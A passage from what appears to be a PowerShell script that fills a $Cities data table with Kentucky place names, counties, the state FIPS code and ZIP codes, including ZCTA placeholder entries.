= $Cities.Rows.Add("Zcta 412hh","Johnson","Kentucky","KY","21","412HH") + $null = $Cities.Rows.Add("Flat","Wolfe","Kentucky","KY","21","41301") + $null = $Cities.Rows.Add("Bays","Breathitt","Kentucky","KY","21","41310") + $null = $Cities.Rows.Add("Vada","Lee","Kentucky","KY","21","41311") + $null = $Cities.Rows.Add("Morris fork","Owsley","Kentucky","KY","21","41314") + $null = $Cities.Rows.Add("Clayhole","Breathitt","Kentucky","KY","21","41317") + $null = $Cities.Rows.Add("Grassy creek","Morgan","Kentucky","KY","21","41332") + $null = $Cities.Rows.Add("Canoe","Breathitt","Kentucky","KY","21","41339") + $null = $Cities.Rows.Add("Lerose","Owsley","Kentucky","KY","21","41344") + $null = $Cities.Rows.Add("Hardshell","Breathitt","Kentucky","KY","21","41348") + $null = $Cities.Rows.Add("Pine ridge","Wolfe","Kentucky","KY","21","41360") + $null = $Cities.Rows.Add("Ricetown","Owsley","Kentucky","KY","21","41364") + $null = $Cities.Rows.Add("Rogers","Wolfe","Kentucky","KY","21","41365") + $null = $Cities.Rows.Add("Rowdy","Perry","Kentucky","KY","21","41367") + $null = $Cities.Rows.Add("Talbert","Breathitt","Kentucky","KY","21","41377") + $null = $Cities.Rows.Add("Vancleve","Breathitt","Kentucky","KY","21","41385") + $null = $Cities.Rows.Add("Vincent","Owsley","Kentucky","KY","21","41386") + $null = $Cities.Rows.Add("Whick","Breathitt","Kentucky","KY","21","41390") + $null = $Cities.Rows.Add("Zoe","Lee","Kentucky","KY","21","41397") + $null = $Cities.Rows.Add("Cannel city","Morgan","Kentucky","KY","21","41408") + $null = $Cities.Rows.Add("Elkfork","Morgan","Kentucky","KY","21","41421") + $null = $Cities.Rows.Add("Ezel","Morgan","Kentucky","KY","21","41425") + $null = $Cities.Rows.Add("Falcon","Magoffin","Kentucky","KY","21","41426") + $null = $Cities.Rows.Add("Royalton","Magoffin","Kentucky","KY","21","41464") + $null = $Cities.Rows.Add("Bethanna","Magoffin","Kentucky","KY","21","41465") + $null = $Cities.Rows.Add("Blairs mill","Morgan","Kentucky","KY","21","41472") + $null = $Cities.Rows.Add("Zcta 414hh","Morgan","Kentucky","KY","21","414HH") + $null = $Cities.Rows.Add("Broad bottom","Pike","Kentucky","KY","21","41501") + $null = $Cities.Rows.Add("South williamson","Pike","Kentucky","KY","21","41503") + $null = $Cities.Rows.Add("Ashcamp","Pike","Kentucky","KY","21","41512") + $null = $Cities.Rows.Add("Belcher","Pike","Kentucky","KY","21","41513") + $null = $Cities.Rows.Add("Belfry","Pike","Kentucky","KY","21","41514") + $null = $Cities.Rows.Add("Canada","Pike","Kentucky","KY","21","41519") + $null = $Cities.Rows.Add("Senterville","Pike","Kentucky","KY","21","41522") + $null = $Cities.Rows.Add("Biggs","Pike","Kentucky","KY","21","41524") + $null = $Cities.Rows.Add("Forest hills","Pike","Kentucky","KY","21","41527") + $null = $Cities.Rows.Add("Freeburn","Pike","Kentucky","KY","21","41528") + $null = $Cities.Rows.Add("Hardy","Pike","Kentucky","KY","21","41531") + $null = $Cities.Rows.Add("Hellier","Pike","Kentucky","KY","21","41534") + $null = $Cities.Rows.Add("Huddy","Pike","Kentucky","KY","21","41535") + $null = $Cities.Rows.Add("Payne gap","Letcher","Kentucky","KY","21","41537") + $null = $Cities.Rows.Add("Jonancy","Pike","Kentucky","KY","21","41538") + $null = $Cities.Rows.Add("Kimper","Pike","Kentucky","KY","21","41539") + $null = $Cities.Rows.Add("Lick creek","Pike","Kentucky","KY","21","41540") + $null = $Cities.Rows.Add("Mc andrews","Pike","Kentucky","KY","21","41543") + $null = $Cities.Rows.Add("Mc carr","Pike","Kentucky","KY","21","41544") + $null = $Cities.Rows.Add("Mc veigh","Pike","Kentucky","KY","21","41546") + $null = $Cities.Rows.Add("Majestic","Pike","Kentucky","KY","21","41547") + $null = $Cities.Rows.Add("Mouthcard","Pike","Kentucky","KY","21","41548") + $null = $Cities.Rows.Add("Myra","Pike","Kentucky","KY","21","41549") + $null = $Cities.Rows.Add("Phelps","Pike","Kentucky","KY","21","41553") + $null = $Cities.Rows.Add("Phyllis","Pike","Kentucky","KY","21","41554") + $null = $Cities.Rows.Add("Pinsonfork","Pike","Kentucky","KY","21","41555") + $null = $Cities.Rows.Add("Fishtrap","Pike","Kentucky","KY","21","41557") + $null = $Cities.Rows.Add("Ransom","Pike","Kentucky","KY","21","41558") + $null = $Cities.Rows.Add("Regina","Pike","Kentucky","KY","21","41559") + $null = $Cities.Rows.Add("Robinson creek","Pike","Kentucky","KY","21","41560") + $null = $Cities.Rows.Add("Shelbiana","Pike","Kentucky","KY","21","41562") + $null = $Cities.Rows.Add("Shelby gap","Pike","Kentucky","KY","21","41563") + $null = $Cities.Rows.Add("Sidney","Pike","Kentucky","KY","21","41564") + $null = $Cities.Rows.Add("Steele","Pike","Kentucky","KY","21","41566") + $null = $Cities.Rows.Add("Stone","Pike","Kentucky","KY","21","41567") + $null = $Cities.Rows.Add("Argo","Pike","Kentucky","KY","21","41568") + $null = $Cities.Rows.Add("Toler","Pike","Kentucky","KY","21","41569") + $null = $Cities.Rows.Add("Varney","Pike","Kentucky","KY","21","41571") + $null = $Cities.Rows.Add("Etty","Pike","Kentucky","KY","21","41572") + $null = $Cities.Rows.Add("Zcta 415hh","Pike","Kentucky","KY","21","415HH") + $null = $Cities.Rows.Add("Allen","Floyd","Kentucky","KY","21","41601") + $null = $Cities.Rows.Add("Auxier","Floyd","Kentucky","KY","21","41602") + $null = $Cities.Rows.Add("Banner","Floyd","Kentucky","KY","21","41603") + $null = $Cities.Rows.Add("Ligon","Floyd","Kentucky","KY","21","41604") + $null = $Cities.Rows.Add("Betsy layne","Floyd","Kentucky","KY","21","41605") + $null = $Cities.Rows.Add("Bevinsville","Floyd","Kentucky","KY","21","41606") + $null = $Cities.Rows.Add("Blue river","Floyd","Kentucky","KY","21","41607") + $null = $Cities.Rows.Add("Bypro","Floyd","Kentucky","KY","21","41612") + $null = $Cities.Rows.Add("Dana","Floyd","Kentucky","KY","21","41615") + $null = $Cities.Rows.Add("David","Floyd","Kentucky","KY","21","41616") + $null = $Cities.Rows.Add("Drift","Floyd","Kentucky","KY","21","41619") + $null = $Cities.Rows.Add("Dwale","Floyd","Kentucky","KY","21","41621") + $null = $Cities.Rows.Add("Eastern","Floyd","Kentucky","KY","21","41622") + $null = $Cities.Rows.Add("Garrett","Floyd","Kentucky","KY","21","41630") + $null = $Cities.Rows.Add("Grethel","Floyd","Kentucky","KY","21","41631") + $null = $Cities.Rows.Add("Waldo","Magoffin","Kentucky","KY","21","41632") + $null = $Cities.Rows.Add("Harold","Floyd","Kentucky","KY","21","41635") + $null = $Cities.Rows.Add("Buckingham","Floyd","Kentucky","KY","21","41636") + $null = $Cities.Rows.Add("Elmrock","Floyd","Kentucky","KY","21","41640") + $null = $Cities.Rows.Add("Ivel","Floyd","Kentucky","KY","21","41642") + $null = $Cities.Rows.Add("Langley","Floyd","Kentucky","KY","21","41645") + $null = $Cities.Rows.Add("East mc dowell","Floyd","Kentucky","KY","21","41647") + $null = $Cities.Rows.Add("Hite","Floyd","Kentucky","KY","21","41649") + $null = $Cities.Rows.Add("Melvin","Floyd","Kentucky","KY","21","41650") + $null = $Cities.Rows.Add("Minnie","Floyd","Kentucky","KY","21","41651") + $null = $Cities.Rows.Add("Emma","Floyd","Kentucky","KY","21","41653") + $null = $Cities.Rows.Add("Printer","Floyd","Kentucky","KY","21","41655") + $null = $Cities.Rows.Add("Stanville","Floyd","Kentucky","KY","21","41659") + $null = $Cities.Rows.Add("Teaberry","Floyd","Kentucky","KY","21","41660") + $null = $Cities.Rows.Add("Tram","Floyd","Kentucky","KY","21","41663") + $null = $Cities.Rows.Add("Wayland","Floyd","Kentucky","KY","21","41666") + $null = $Cities.Rows.Add("Weeksbury","Floyd","Kentucky","KY","21","41667") + $null = $Cities.Rows.Add("Wheelwright","Floyd","Kentucky","KY","21","41669") + $null = $Cities.Rows.Add("Zcta 416hh","Floyd","Kentucky","KY","21","416HH") + $null = $Cities.Rows.Add("Darfork","Perry","Kentucky","KY","21","41701") + $null = $Cities.Rows.Add("Ary","Perry","Kentucky","KY","21","41712") + $null = $Cities.Rows.Add("Bear branch","Leslie","Kentucky","KY","21","41714") + $null = $Cities.Rows.Add("Blue diamond","Perry","Kentucky","KY","21","41719") + $null = $Cities.Rows.Add("Buckhorn","Perry","Kentucky","KY","21","41721") + $null = $Cities.Rows.Add("Tribbey","Perry","Kentucky","KY","21","41722") + $null = $Cities.Rows.Add("Busy","Perry","Kentucky","KY","21","41723") + $null = $Cities.Rows.Add("Carrie","Knott","Kentucky","KY","21","41725") + $null = $Cities.Rows.Add("Chavies","Perry","Kentucky","KY","21","41727") + $null = $Cities.Rows.Add("Combs","Perry","Kentucky","KY","21","41729") + $null = $Cities.Rows.Add("Confluence","Leslie","Kentucky","KY","21","41730") + $null = $Cities.Rows.Add("Ulvah","Perry","Kentucky","KY","21","41731") + $null = $Cities.Rows.Add("Delphia","Perry","Kentucky","KY","21","41735") + $null = $Cities.Rows.Add("Dice","Perry","Kentucky","KY","21","41736") + $null = $Cities.Rows.Add("Dwarf","Knott","Kentucky","KY","21","41739") + $null = $Cities.Rows.Add("Bearville","Knott","Kentucky","KY","21","41740") + $null = $Cities.Rows.Add("Gays creek","Perry","Kentucky","KY","21","41745") + $null = $Cities.Rows.Add("Happy","Perry","Kentucky","KY","21","41746") + $null = $Cities.Rows.Add("Dryhill","Leslie","Kentucky","KY","21","41749") + $null = $Cities.Rows.Add("Jeff","Perry","Kentucky","KY","21","41751") + $null = $Cities.Rows.Add("Napfor","Perry","Kentucky","KY","21","41754") + $null = $Cities.Rows.Add("Anco","Knott","Kentucky","KY","21","41759") + $null = $Cities.Rows.Add("Scuddy","Perry","Kentucky","KY","21","41760") + $null = $Cities.Rows.Add("Sizerock","Leslie","Kentucky","KY","21","41762") + $null = $Cities.Rows.Add("Slemp","Perry","Kentucky","KY","21","41763") + $null = $Cities.Rows.Add("Smilax","Leslie","Kentucky","KY","21","41764") + $null = $Cities.Rows.Add("Thousandsticks","Leslie","Kentucky","KY","21","41766") + $null = $Cities.Rows.Add("Vest","Knott","Kentucky","KY","21","41772") + $null = $Cities.Rows.Add("Vicco","Perry","Kentucky","KY","21","41773") + $null = $Cities.Rows.Add("Farler","Perry","Kentucky","KY","21","41774") + $null = $Cities.Rows.Add("Wendover","Leslie","Kentucky","KY","21","41775") + $null = $Cities.Rows.Add("Frew","Leslie","Kentucky","KY","21","41776") + $null = $Cities.Rows.Add("Big rock","Leslie","Kentucky","KY","21","41777") + $null = $Cities.Rows.Add("Yerkes","Perry","Kentucky","KY","21","41778") + $null = $Cities.Rows.Add("Zcta 417hh","Knott","Kentucky","KY","21","417HH") + $null = $Cities.Rows.Add("Carcassonne","Letcher","Kentucky","KY","21","41804") + $null = $Cities.Rows.Add("Cromona","Letcher","Kentucky","KY","21","41810") + $null = $Cities.Rows.Add("Deane","Letcher","Kentucky","KY","21","41812") + $null = $Cities.Rows.Add("Ermine","Letcher","Kentucky","KY","21","41815") + $null = $Cities.Rows.Add("Larkslane","Knott","Kentucky","KY","21","41817") + $null = $Cities.Rows.Add("Gilly","Letcher","Kentucky","KY","21","41819") + $null = $Cities.Rows.Add("Skyline","Letcher","Kentucky","KY","21","41821") + $null = $Cities.Rows.Add("Hindman","Knott","Kentucky","KY","21","41822") + $null = $Cities.Rows.Add("Isom","Letcher","Kentucky","KY","21","41824") + $null = $Cities.Rows.Add("Jackhorn","Letcher","Kentucky","KY","21","41825") + $null = $Cities.Rows.Add("Jeremiah","Letcher","Kentucky","KY","21","41826") + $null = $Cities.Rows.Add("Puncheon","Knott","Kentucky","KY","21","41828") + $null = $Cities.Rows.Add("Soft shell","Knott","Kentucky","KY","21","41831") + $null = $Cities.Rows.Add("Letcher","Letcher","Kentucky","KY","21","41832") + $null = $Cities.Rows.Add("Linefork","Letcher","Kentucky","KY","21","41833") + $null = $Cities.Rows.Add("Littcarr","Knott","Kentucky","KY","21","41834") + $null = $Cities.Rows.Add("Mc roberts","Letcher","Kentucky","KY","21","41835") + $null = $Cities.Rows.Add("Mallie","Knott","Kentucky","KY","21","41836") + $null = $Cities.Rows.Add("Mayking","Letcher","Kentucky","KY","21","41837") + $null = $Cities.Rows.Add("Millstone","Letcher","Kentucky","KY","21","41838") + $null = $Cities.Rows.Add("Mousie","Knott","Kentucky","KY","21","41839") + $null = $Cities.Rows.Add("Fleming neon","Letcher","Kentucky","KY","21","41840") + $null = $Cities.Rows.Add("Omaha","Knott","Kentucky","KY","21","41843") + $null = $Cities.Rows.Add("Raven","Knott","Kentucky","KY","21","41844") + $null = $Cities.Rows.Add("Premium","Letcher","Kentucky","KY","21","41845") + $null = $Cities.Rows.Add("Redfox","Knott","Kentucky","KY","21","41847") + $null = $Cities.Rows.Add("Seco","Letcher","Kentucky","KY","21","41849") + $null = $Cities.Rows.Add("Thornton","Letcher","Kentucky","KY","21","41855") + $null = $Cities.Rows.Add("Day rural","Letcher","Kentucky","KY","21","41858") + $null = $Cities.Rows.Add("Dema","Knott","Kentucky","KY","21","41859") + $null = $Cities.Rows.Add("Raven","Knott","Kentucky","KY","21","41861") + $null = $Cities.Rows.Add("Dry creek","Knott","Kentucky","KY","21","41862") + $null = $Cities.Rows.Add("Zcta 418hh","Knott","Kentucky","KY","21","418HH") + $null = $Cities.Rows.Add("Paducah","McCracken","Kentucky","KY","21","42001") + $null = $Cities.Rows.Add("Paducah","McCracken","Kentucky","KY","21","42003") + $null = $Cities.Rows.Add("Almo","Calloway","Kentucky","KY","21","42020") + $null = $Cities.Rows.Add("Arlington","Carlisle","Kentucky","KY","21","42021") + $null = $Cities.Rows.Add("Bandana","Ballard","Kentucky","KY","21","42022") + $null = $Cities.Rows.Add("Bardwell","Carlisle","Kentucky","KY","21","42023") + $null = $Cities.Rows.Add("Barlow","Ballard","Kentucky","KY","21","42024") + $null = $Cities.Rows.Add("Benton","Marshall","Kentucky","KY","21","42025") + $null = $Cities.Rows.Add("Boaz","Graves","Kentucky","KY","21","42027") + $null = $Cities.Rows.Add("Burna","Livingston","Kentucky","KY","21","42028") + $null = $Cities.Rows.Add("Calvert city","Marshall","Kentucky","KY","21","42029") + $null = $Cities.Rows.Add("Clinton","Hickman","Kentucky","KY","21","42031") + $null = $Cities.Rows.Add("Columbus","Hickman","Kentucky","KY","21","42032") + $null = $Cities.Rows.Add("Cunningham","Carlisle","Kentucky","KY","21","42035") + $null = $Cities.Rows.Add("Dexter","Calloway","Kentucky","KY","21","42036") + $null = $Cities.Rows.Add("Eddyville","Lyon","Kentucky","KY","21","42038") + $null = $Cities.Rows.Add("Fancy farm","Graves","Kentucky","KY","21","42039") + $null = $Cities.Rows.Add("Farmington","Graves","Kentucky","KY","21","42040") + $null = $Cities.Rows.Add("Crutchfield","Fulton","Kentucky","KY","21","42041") + $null = $Cities.Rows.Add("Gilbertsville","Marshall","Kentucky","KY","21","42044") + $null = $Cities.Rows.Add("Iuka","Livingston","Kentucky","KY","21","42045") + $null = $Cities.Rows.Add("Hampton","Livingston","Kentucky","KY","21","42047") + $null = $Cities.Rows.Add("Hardin","Marshall","Kentucky","KY","21","42048") + $null = $Cities.Rows.Add("Hazel","Calloway","Kentucky","KY","21","42049") + $null = $Cities.Rows.Add("Hickman","Fulton","Kentucky","KY","21","42050") + $null = $Cities.Rows.Add("Hickory","Graves","Kentucky","KY","21","42051") + $null = $Cities.Rows.Add("Kevil","McCracken","Kentucky","KY","21","42053") + $null = $Cities.Rows.Add("Kirksey","Calloway","Kentucky","KY","21","42054") + $null = $Cities.Rows.Add("Kuttawa","Lyon","Kentucky","KY","21","42055") + $null = $Cities.Rows.Add("La center","Ballard","Kentucky","KY","21","42056") + $null = $Cities.Rows.Add("Ledbetter","Livingston","Kentucky","KY","21","42058") + $null = $Cities.Rows.Add("Lovelaceville","Ballard","Kentucky","KY","21","42060") + $null = $Cities.Rows.Add("Lowes","Graves","Kentucky","KY","21","42061") + $null = $Cities.Rows.Add("Marion","Crittenden","Kentucky","KY","21","42064") + $null = $Cities.Rows.Add("Mayfield","Graves","Kentucky","KY","21","42066") + $null = $Cities.Rows.Add("Melber","Graves","Kentucky","KY","21","42069") + $null = $Cities.Rows.Add("Murray","Calloway","Kentucky","KY","21","42071") + $null = $Cities.Rows.Add("New concord","Calloway","Kentucky","KY","21","42076") + $null = $Cities.Rows.Add("Salem","Livingston","Kentucky","KY","21","42078") + $null = $Cities.Rows.Add("Sedalia","Graves","Kentucky","KY","21","42079") + $null = $Cities.Rows.Add("Carrsville","Livingston","Kentucky","KY","21","42081") + $null = $Cities.Rows.Add("Symsonia","Graves","Kentucky","KY","21","42082") + $null = $Cities.Rows.Add("Tiline","Livingston","Kentucky","KY","21","42083") + $null = $Cities.Rows.Add("Tolu","Crittenden","Kentucky","KY","21","42084") + $null = $Cities.Rows.Add("Water valley","Graves","Kentucky","KY","21","42085") + $null = $Cities.Rows.Add("West paducah","McCracken","Kentucky","KY","21","42086") + $null = $Cities.Rows.Add("Wickliffe","Ballard","Kentucky","KY","21","42087") + $null = $Cities.Rows.Add("Wingo","Graves","Kentucky","KY","21","42088") + $null = $Cities.Rows.Add("Zcta 420hh","Ballard","Kentucky","KY","21","420HH") + $null = $Cities.Rows.Add("Zcta 420xx","Ballard","Kentucky","KY","21","420XX") + $null = $Cities.Rows.Add("Plum springs","Warren","Kentucky","KY","21","42101") + $null = $Cities.Rows.Add("Bowling green","Warren","Kentucky","KY","21","42103") + $null = $Cities.Rows.Add("Bowling green","Warren","Kentucky","KY","21","42104") + $null = $Cities.Rows.Add("Adolphus","Allen","Kentucky","KY","21","42120") + $null = $Cities.Rows.Add("Alvaton","Warren","Kentucky","KY","21","42122") + $null = $Cities.Rows.Add("Austin","Barren","Kentucky","KY","21","42123") + $null = $Cities.Rows.Add("Cave city","Barren","Kentucky","KY","21","42127") + $null = $Cities.Rows.Add("Subtle","Metcalfe","Kentucky","KY","21","42129") + $null = $Cities.Rows.Add("Etoile","Barren","Kentucky","KY","21","42131") + $null = $Cities.Rows.Add("Fountain run","Monroe","Kentucky","KY","21","42133") + $null = $Cities.Rows.Add("Franklin","Simpson","Kentucky","KY","21","42134") + $null = $Cities.Rows.Add("Gamaliel","Monroe","Kentucky","KY","21","42140") + $null = $Cities.Rows.Add("Glasgow","Barren","Kentucky","KY","21","42141") + $null = $Cities.Rows.Add("Hestand","Monroe","Kentucky","KY","21","42151") + $null = $Cities.Rows.Add("Holland","Allen","Kentucky","KY","21","42153") + $null = $Cities.Rows.Add("Knob lick","Metcalfe","Kentucky","KY","21","42154") + $null = $Cities.Rows.Add("Mount herman","Monroe","Kentucky","KY","21","42157") + $null = $Cities.Rows.Add("Oakland","Warren","Kentucky","KY","21","42159") + $null = $Cities.Rows.Add("Park city","Barren","Kentucky","KY","21","42160") + $null = $Cities.Rows.Add("Scottsville","Allen","Kentucky","KY","21","42164") + $null = $Cities.Rows.Add("Summer shade","Metcalfe","Kentucky","KY","21","42166") + $null = $Cities.Rows.Add("T ville","Monroe","Kentucky","KY","21","42167") + $null = $Cities.Rows.Add("Woodburn","Warren","Kentucky","KY","21","42170") + $null = $Cities.Rows.Add("Smiths grove","Warren","Kentucky","KY","21","42171") + $null = $Cities.Rows.Add("Zcta 421hh","Allen","Kentucky","KY","21","421HH") + $null = $Cities.Rows.Add("Adairville","Logan","Kentucky","KY","21","42202") + $null = $Cities.Rows.Add("Allensville","Todd","Kentucky","KY","21","42204") + $null = $Cities.Rows.Add("Auburn","Logan","Kentucky","KY","21","42206") + $null = $Cities.Rows.Add("Bee spring","Edmonson","Kentucky","KY","21","42207") + $null = $Cities.Rows.Add("Reedyville","Edmonson","Kentucky","KY","21","42210") + $null = $Cities.Rows.Add("Golden pond","Trigg","Kentucky","KY","21","42211") + $null = $Cities.Rows.Add("Center","Metcalfe","Kentucky","KY","21","42214") + $null = $Cities.Rows.Add("Cerulean","Christian","Kentucky","KY","21","42215") + $null = $Cities.Rows.Add("Crofton","Christian","Kentucky","KY","21","42217") + $null = $Cities.Rows.Add("Elkton","Todd","Kentucky","KY","21","42220") + $null = $Cities.Rows.Add("Fort campbell","Christian","Kentucky","KY","21","42223") + $null = $Cities.Rows.Add("Gracey","Christian","Kentucky","KY","21","42232") + $null = $Cities.Rows.Add("Tiny town","Todd","Kentucky","KY","21","42234") + $null = $Cities.Rows.Add("Herndon","Christian","Kentucky","KY","21","42236") + $null = $Cities.Rows.Add("Hopkinsville","Christian","Kentucky","KY","21","42240") + $null = $Cities.Rows.Add("La fayette","Christian","Kentucky","KY","21","42254") + $null = $Cities.Rows.Add("Lewisburg","Logan","Kentucky","KY","21","42256") + $null = $Cities.Rows.Add("Mammoth cave nat","Edmonson","Kentucky","KY","21","42259") + $null = $Cities.Rows.Add("Logansport","Butler","Kentucky","KY","21","42261") + $null = $Cities.Rows.Add("Oak grove","Christian","Kentucky","KY","21","42262") + $null = $Cities.Rows.Add("Olmstead","Logan","Kentucky","KY","21","42265") + $null = $Cities.Rows.Add("Pembroke","Christian","Kentucky","KY","21","42266") + $null = $Cities.Rows.Add("Rochester","Butler","Kentucky","KY","21","42273") + $null = $Cities.Rows.Add("Browning","Warren","Kentucky","KY","21","42274") + $null = $Cities.Rows.Add("Roundhill","Butler","Kentucky","KY","21","42275") + $null = $Cities.Rows.Add("Daysville","Logan","Kentucky","KY","21","42276") + $null = $Cities.Rows.Add("Sharon grove","Todd","Kentucky","KY","21","42280") + $null = $Cities.Rows.Add("Kyrock","Edmonson","Kentucky","KY","21","42285") + $null = $Cities.Rows.Add("Trenton","Todd","Kentucky","KY","21","42286") + $null = $Cities.Rows.Add("Welchs creek","Butler","Kentucky","KY","21","42287") + $null = $Cities.Rows.Add("Zcta 422hh","Butler","Kentucky","KY","21","422HH") + $null = $Cities.Rows.Add("Zcta 422xx","Trigg","Kentucky","KY","21","422XX") + $null = $Cities.Rows.Add("Owensboro","Daviess","Kentucky","KY","21","42301") + $null = $Cities.Rows.Add("Owensboro","Daviess","Kentucky","KY","21","42303") + $null = $Cities.Rows.Add("Beaver dam","Ohio","Kentucky","KY","21","42320") + $null = $Cities.Rows.Add("Beech creek","Muhlenberg","Kentucky","KY","21","42321") + $null = $Cities.Rows.Add("Beechmont","Muhlenberg","Kentucky","KY","21","42323") + $null = $Cities.Rows.Add("Belton","Muhlenberg","Kentucky","KY","21","42324") + $null = $Cities.Rows.Add("Bremen","Muhlenberg","Kentucky","KY","21","42325") + $null = $Cities.Rows.Add("Browder","Muhlenberg","Kentucky","KY","21","42326") + $null = $Cities.Rows.Add("Calhoun","McLean","Kentucky","KY","21","42327") + $null = $Cities.Rows.Add("Centertown","Ohio","Kentucky","KY","21","42328") + $null = $Cities.Rows.Add("Central city","Muhlenberg","Kentucky","KY","21","42330") + $null = $Cities.Rows.Add("Cleaton","Muhlenberg","Kentucky","KY","21","42332") + $null = $Cities.Rows.Add("Cromwell","Ohio","Kentucky","KY","21","42333") + $null = $Cities.Rows.Add("Drakesboro","Muhlenberg","Kentucky","KY","21","42337") + $null = $Cities.Rows.Add("Dundee","Ohio","Kentucky","KY","21","42338") + $null = $Cities.Rows.Add("Dunmor","Muhlenberg","Kentucky","KY","21","42339") + $null = $Cities.Rows.Add("Fordsville","Ohio","Kentucky","KY","21","42343") + $null = $Cities.Rows.Add("Graham","Muhlenberg","Kentucky","KY","21","42344") + $null = $Cities.Rows.Add("Greenville","Muhlenberg","Kentucky","KY","21","42345") + $null = $Cities.Rows.Add("Hartford","Ohio","Kentucky","KY","21","42347") + $null = $Cities.Rows.Add("Hawesville","Hancock","Kentucky","KY","21","42348") + $null = $Cities.Rows.Add("Horse branch","Ohio","Kentucky","KY","21","42349") + $null = $Cities.Rows.Add("Island","McLean","Kentucky","KY","21","42350") + $null = $Cities.Rows.Add("Lewisport","Hancock","Kentucky","KY","21","42351") + $null = $Cities.Rows.Add("Livermore","McLean","Kentucky","KY","21","42352") + $null = $Cities.Rows.Add("Mc henry","Ohio","Kentucky","KY","21","42354") + $null = $Cities.Rows.Add("Maceo","Daviess","Kentucky","KY","21","42355") + $null = $Cities.Rows.Add("Olaton","Ohio","Kentucky","KY","21","42361") + $null = $Cities.Rows.Add("Penrod","Muhlenberg","Kentucky","KY","21","42365") + $null = $Cities.Rows.Add("Philpot","Daviess","Kentucky","KY","21","42366") + $null = $Cities.Rows.Add("Reynolds station","Hancock","Kentucky","KY","21","42368") + $null = $Cities.Rows.Add("Rockport","Ohio","Kentucky","KY","21","42369") + $null = $Cities.Rows.Add("Rosine","Ohio","Kentucky","KY","21","42370") + $null = $Cities.Rows.Add("Rumsey","McLean","Kentucky","KY","21","42371") + $null = $Cities.Rows.Add("Sacramento","McLean","Kentucky","KY","21","42372") + $null = $Cities.Rows.Add("South carrollton","Muhlenberg","Kentucky","KY","21","42374") + $null = $Cities.Rows.Add("Utica","Daviess","Kentucky","KY","21","42376") + $null = $Cities.Rows.Add("Whitesville","Daviess","Kentucky","KY","21","42378") + $null = $Cities.Rows.Add("Zcta 423hh","Butler","Kentucky","KY","21","423HH") + $null = $Cities.Rows.Add("Zcta 423xx","Muhlenberg","Kentucky","KY","21","423XX") + $null = $Cities.Rows.Add("Blackford","Webster","Kentucky","KY","21","42403") + $null = $Cities.Rows.Add("Clay","Webster","Kentucky","KY","21","42404") + $null = $Cities.Rows.Add("Corydon","Henderson","Kentucky","KY","21","42406") + $null = $Cities.Rows.Add("Dawson springs","Hopkins","Kentucky","KY","21","42408") + $null = $Cities.Rows.Add("Dixon","Webster","Kentucky","KY","21","42409") + $null = $Cities.Rows.Add("Earlington","Hopkins","Kentucky","KY","21","42410") + $null = $Cities.Rows.Add("Fredonia","Caldwell","Kentucky","KY","21","42411") + $null = $Cities.Rows.Add("Hanson","Hopkins","Kentucky","KY","21","42413") + $null = $Cities.Rows.Add("Henderson","Henderson","Kentucky","KY","21","42420") + $null = $Cities.Rows.Add("Madisonville","Hopkins","Kentucky","KY","21","42431") + $null = $Cities.Rows.Add("Manitou","Hopkins","Kentucky","KY","21","42436") + $null = $Cities.Rows.Add("Henshaw","Union","Kentucky","KY","21","42437") + $null = $Cities.Rows.Add("Mortons gap","Hopkins","Kentucky","KY","21","42440") + $null = $Cities.Rows.Add("Nebo","Hopkins","Kentucky","KY","21","42441") + $null = $Cities.Rows.Add("Nortonville","Hopkins","Kentucky","KY","21","42442") + $null = $Cities.Rows.Add("Poole","Webster","Kentucky","KY","21","42444") + $null = $Cities.Rows.Add("Princeton","Caldwell","Kentucky","KY","21","42445") + $null = $Cities.Rows.Add("Providence","Webster","Kentucky","KY","21","42450") + $null = $Cities.Rows.Add("Reed","Henderson","Kentucky","KY","21","42451") + $null = $Cities.Rows.Add("Robards","Henderson","Kentucky","KY","21","42452") + $null = $Cities.Rows.Add("Saint charles","Hopkins","Kentucky","KY","21","42453") + $null = $Cities.Rows.Add("Sebree","Webster","Kentucky","KY","21","42455") + $null = $Cities.Rows.Add("Slaughters","Webster","Kentucky","KY","21","42456") + $null = $Cities.Rows.Add("Smith mills","Henderson","Kentucky","KY","21","42457") + $null = $Cities.Rows.Add("Spottsville","Henderson","Kentucky","KY","21","42458") + $null = $Cities.Rows.Add("Sturgis","Union","Kentucky","KY","21","42459") + $null = $Cities.Rows.Add("Uniontown","Union","Kentucky","KY","21","42461") + $null = $Cities.Rows.Add("Waverly","Union","Kentucky","KY","21","42462") + $null = $Cities.Rows.Add("Wheatcroft","Webster","Kentucky","KY","21","42463") + $null = $Cities.Rows.Add("White plains","Hopkins","Kentucky","KY","21","42464") + $null = $Cities.Rows.Add("Zcta 424hh","Caldwell","Kentucky","KY","21","424HH") + $null = $Cities.Rows.Add("Zcta 424xx","Henderson","Kentucky","KY","21","424XX") + $null = $Cities.Rows.Add("Alcalde","Pulaski","Kentucky","KY","21","42501") + $null = $Cities.Rows.Add("Zcta 42503","Pulaski","Kentucky","KY","21","42503") + $null = $Cities.Rows.Add("Bethelridge","Casey","Kentucky","KY","21","42516") + $null = $Cities.Rows.Add("Bronston","Pulaski","Kentucky","KY","21","42518") + $null = $Cities.Rows.Add("Sloans valley","Pulaski","Kentucky","KY","21","42519") + $null = $Cities.Rows.Add("Dunnville","Casey","Kentucky","KY","21","42528") + $null = $Cities.Rows.Add("Ferguson","Pulaski","Kentucky","KY","21","42533") + $null = $Cities.Rows.Add("Liberty","Casey","Kentucky","KY","21","42539") + $null = $Cities.Rows.Add("Middleburg","Casey","Kentucky","KY","21","42541") + $null = $Cities.Rows.Add("Pointer","Pulaski","Kentucky","KY","21","42544") + $null = $Cities.Rows.Add("Science hill","Pulaski","Kentucky","KY","21","42553") + $null = $Cities.Rows.Add("Windsor","Casey","Kentucky","KY","21","42565") + $null = $Cities.Rows.Add("Yosemite","Casey","Kentucky","KY","21","42566") + $null = $Cities.Rows.Add("Pulaski","Pulaski","Kentucky","KY","21","42567") + $null = $Cities.Rows.Add("Zcta 425hh","Pulaski","Kentucky","KY","21","425HH") + $null = $Cities.Rows.Add("Albany","Clinton","Kentucky","KY","21","42602") + $null = $Cities.Rows.Add("Alpha","Wayne","Kentucky","KY","21","42603") + $null = $Cities.Rows.Add("Jamestown","Russell","Kentucky","KY","21","42629") + $null = $Cities.Rows.Add("Marshes siding","McCreary","Kentucky","KY","21","42631") + $null = $Cities.Rows.Add("Mill springs","Wayne","Kentucky","KY","21","42632") + $null = $Cities.Rows.Add("Pueblo","Wayne","Kentucky","KY","21","42633") + $null = $Cities.Rows.Add("Parkers lake","McCreary","Kentucky","KY","21","42634") + $null = $Cities.Rows.Add("Hollyhill","McCreary","Kentucky","KY","21","42635") + $null = 